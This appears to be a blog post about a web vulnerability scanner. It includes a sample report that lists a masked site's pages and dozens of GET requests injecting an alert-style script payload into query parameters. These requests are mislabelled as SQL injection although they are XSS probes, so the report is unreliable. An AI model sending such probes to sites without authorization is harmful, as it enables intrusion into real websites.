JAAScois AntiWebInjection
This program is very simple to use: first we download it from here or from its official website. It enumerates all the pages and files that a website has and searches them for passwords or flaws. It is very fast and very useful if you want to see the full content of a website.
Once it is installed, we simply run it and enter the website to 'investigate'. We start the scan, and when it finishes it produces a report in a text document like this one (here):
Pages:
http://www.XXXXXX.com/portal/default.aspx
http://www.XXXXXX.com/portal/DesktopDefault.aspx
http://www.XXXXXX.com/portal/portal.css
http://www.XXXXXX.com/portal/admin/cambiarClave.aspx
http://www.XXXXXX.com/portal
http://www.XXXXXX.com/portal/Docs/Docs.htm
http://www.XXXXXX.com/portal/DesktopDefault.aspx?HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=4&ModuleID=94
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=5&ModuleID=94
http://www.XXXXXX.com/portal/Uploads/SolucionRPS/Campaña
http://www.XXXXXX.com/portal/
http://www.XXXXXX.com/portal/Docs/style.css
http://www.XXXXXX.com/portal/RPSModules/WebRecordarContrasenna.aspx
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9
http://www.XXXXXX.com/portal/Uploads/Clientes/VirreyExito.pdf
http://www.XXXXXX.com/portal/Uploads/Clientes/Casos
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9&HacerLogin=1
=>=>=>=>
Exploits:
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?HacerLogin=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=4&ModuleID=94<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=5&ModuleID=94<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
may be upload page
Req: GET
http://www.XXXXXX.com/portal/Uploads/SolucionRPS/Campaña
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
may be upload page
Req: GET
http://www.XXXXXX.com/portal/Uploads/Clientes/VirreyExito.pdf
More Info: http://www.jaascois.com
may be upload page
Req: GET
http://www.XXXXXX.com/portal/Uploads/Clientes/Casos
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
Error 404 page not found
Req: GET
http://www.XXXXXX.com/portal/Uploads/SolucionRPS/Campaña
More Info: http://www.jaascois.com
Error 404 page not found
Req: GET
http://www.XXXXXX.com/portal/Docs/style.css
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
Error 404 page not found
Req: GET
http://www.XXXXXX.com/portal/Uploads/Clientes/Casos
More Info: http://www.jaascois.com